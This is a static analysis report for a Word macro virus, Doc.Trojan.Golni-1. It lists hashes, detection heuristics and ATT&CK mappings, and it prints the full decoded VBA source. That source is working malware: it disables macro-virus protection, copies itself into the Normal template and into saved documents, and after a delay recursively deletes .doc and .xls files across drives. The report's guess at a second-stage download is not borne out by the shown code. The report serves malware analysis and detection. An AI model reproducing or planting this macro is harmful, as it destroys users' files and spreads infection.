Doc.Trojan.Golni-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 b00a3e708cf4fc84…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2002-08-21 11:12:00
Authoring application: Microsoft Word 9.0
First seen: 2015-09-30
MD5: 8482b8095ebf7036b2651c91196aae20
SHA-1: 292f029275b5a2ae32e319ac405ca637a4087174
SHA-256: b00a3e708cf4fc84196fe2661fe874b2348a97c3625adde546df22112f34d7df
Risk Score: 248

Malware Insights

Doc.Trojan.Golni-1 · confidence 95%

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1553.005 Mark-of-the-Web Bypass

The sample contains VBA macros with legacy WordBasic virus markers and self-replication capabilities, indicating malicious intent. The 'AutoOpen' macro and the 'Doc.Trojan.Golni-1' ClamAV detection further support this. The script likely aims to download and execute a second-stage payload, as suggested by the presence of file system interaction functions and the general behavior of this malware family.

Heuristics (5)

  • ClamAV: Doc.Trojan.Golni-1 · severity: critical · rule: CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Golni-1
  • VBA macros detected · severity: medium · 2 related findings · rule: OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering · severity: critical · rule: OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro · severity: low · rule: OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
     Sub AutoOpen()
  • Legacy WordBasic macro-virus markers · severity: high · rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5237 bytes
SHA-256: 5f73ce9ed009aaa4345c5cfd52302b62323754646953bc014d9ee6e4c5235692
Detection: ClamAV: Doc.Trojan.Golni-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "avp"
Option Explicit
Dim k As String, f As String
Private Declare Function FindFirstFile Lib "kernel32" _
Alias "FindFirstFileA" _
(ByVal lpFileName As String, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" _
Alias "FindNextFileA" _
(ByVal hFindFile As Long, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function GetFileAttributes Lib "kernel32" _
Alias "GetFileAttributesA" _
(ByVal lpFileName As String) As Long
Private Declare Function FindClose Lib "kernel32" _
(ByVal hFindFile As Long) As Long
Const MAX_PATH = 260
Const MAXDWORD = &HFFFF
Const INVALID_HANDLE_VALUE = -1
Const FILE_ATTRIBUTE_ARCHIVE = &H20
Const FILE_ATTRIBUTE_DIRECTORY = &H10
Const FILE_ATTRIBUTE_HIDDEN = &H2
Const FILE_ATTRIBUTE_NORMAL = &H80
Const FILE_ATTRIBUTE_READONLY = &H1
Const FILE_ATTRIBUTE_SYSTEM = &H4
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Function StripNulls(OriginalStr As String) As String
If (InStr(OriginalStr, Chr(0)) > 0) Then
OriginalStr = Left(OriginalStr, _
InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function
Private Function FindFilesAPI(path As String, _
SearchStr As String, _
FileCount As Integer, _
DirCount As Integer)
On Error Resume Next
Dim FileName As String
Dim DirName As String
Dim dirNames() As String
Dim nDir As Integer
Dim i As Integer
Dim hSearch As Long
Dim WFD As WIN32_FIND_DATA
Dim Cont As Integer
If Right(path, 1) <> "\" Then path = path & "\"
nDir = 0
ReDim dirNames(nDir)
Cont = True
hSearch = FindFirstFile(path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While Cont
DirName = StripNulls(WFD.cFileName)
If (DirName <> ".") And (DirName <> "..") Then
If GetFileAttributes(path & DirName) And _
                           FILE_ATTRIBUTE_DIRECTORY Then
dirNames(nDir) = DirName
DirCount = DirCount + 1
nDir = nDir + 1
ReDim Preserve dirNames(nDir)
End If
End If
Cont = FindNextFile(hSearch, WFD)
Loop
Cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(path & SearchStr, WFD)
Cont = True
If hSearch <> INVALID_HANDLE_VALUE Then
While Cont
FileName = StripNulls(WFD.cFileName)
If (FileName <> ".") And (FileName <> "..") Then
FindFilesAPI = FindFilesAPI + _
(WFD.nFileSizeHigh * MAXDWORD) + _
WFD.nFileSizeLow
FileCount = FileCount + 1
On Error Resume Next
Kill path & FileName
End If
Cont = FindNextFile(hSearch, WFD)
Wend
Cont = FindClose(hSearch)
End If
If nDir > 0 Then
For i = 0 To nDir - 1
FindFilesAPI = FindFilesAPI + _
FindFilesAPI(path & dirNames(i) _
& "\", SearchStr, FileCount, DirCount)
Next i
End If
End Function
 Sub AutoOpen()
Dim ad, nt
On Error Resume Next
Options.VirusProtection = False
ad = ActiveDocument.Name
nt = NormalTemplate.FullName
If NormalTemplate.VBProject.VBComponents.Item("Avp").Name = " " Then
k = FreeFile
MakeFile
End If
If NormalTemplate.VBProject.VBComponents.Item("Avp").Name <> "Avp" Then
Application.OrganizerCopy Source:=ad, Destination:=nt, Name:="Avp", Object:=wdOrganizerObjectProjectItems
End If
NormalTemplate.Save
DooIt
End Sub
Sub FileSave()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Avp").Name <> "avp" Then
NormalTemplate.VBProject.VBComponents("avp").Export "C:\Winlog.log"
ActiveDocument.VBProject.VBComponents.import "C:\Winlog.log"
Kill "C:\Winlog.log"
End If
ActiveDocument.Save
k = FreeFile
f = Dir$("C:\WINDOWS\Application Data\HelBoot.txt")
If f = "" Then
MakeFile
End If
DooIt
End Sub
Sub ViewVBCode()
If Options.BlueScreen = True Then ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
End Sub
Sub DooIt()
On Error Resume Next
Dim d1 As Date, d, k As String, d2 As Date, t As Date
d1 = Format(Now, "short date"): k = FreeFile
Open "C:\WINDOWS\HelBoot.txt" For Input As #k
t = Format(Now, "short date")
Input #k, t
Close k
d2 = CDate(t): d = d1 - d2
Dim NumFiles As Integer, NumDirs As Integer, FileSize As Long
Dim SearchPath As String, FindStr As String, p, s
s = Int(1 + (Rnd() * 2))
If s = 1 Then
SearchPath = "C:\"
ElseIf s = 2 Then
SearchPath = "D:\"
End If
If 5 < d Then
p = Int(1 + (Rnd() * 2))
If p = 1 Then
FindStr = "*.xls"
ElseIf p = 2 Then
FindStr = "*.doc"
ElseIf p = 1 And 12 < d Then
FindStr = "*.txt"
End If
FileSize = FindFilesAPI(SearchPath, FindStr, NumFiles, NumDirs)
End If
End Sub
Sub MakeFile()
Open "C:\WINDOWS\Application Data\HelBoot.txt" For Output As #k
Dim t As Date
t = Format(Now, "short date")
Write #k, t
Close k
End Sub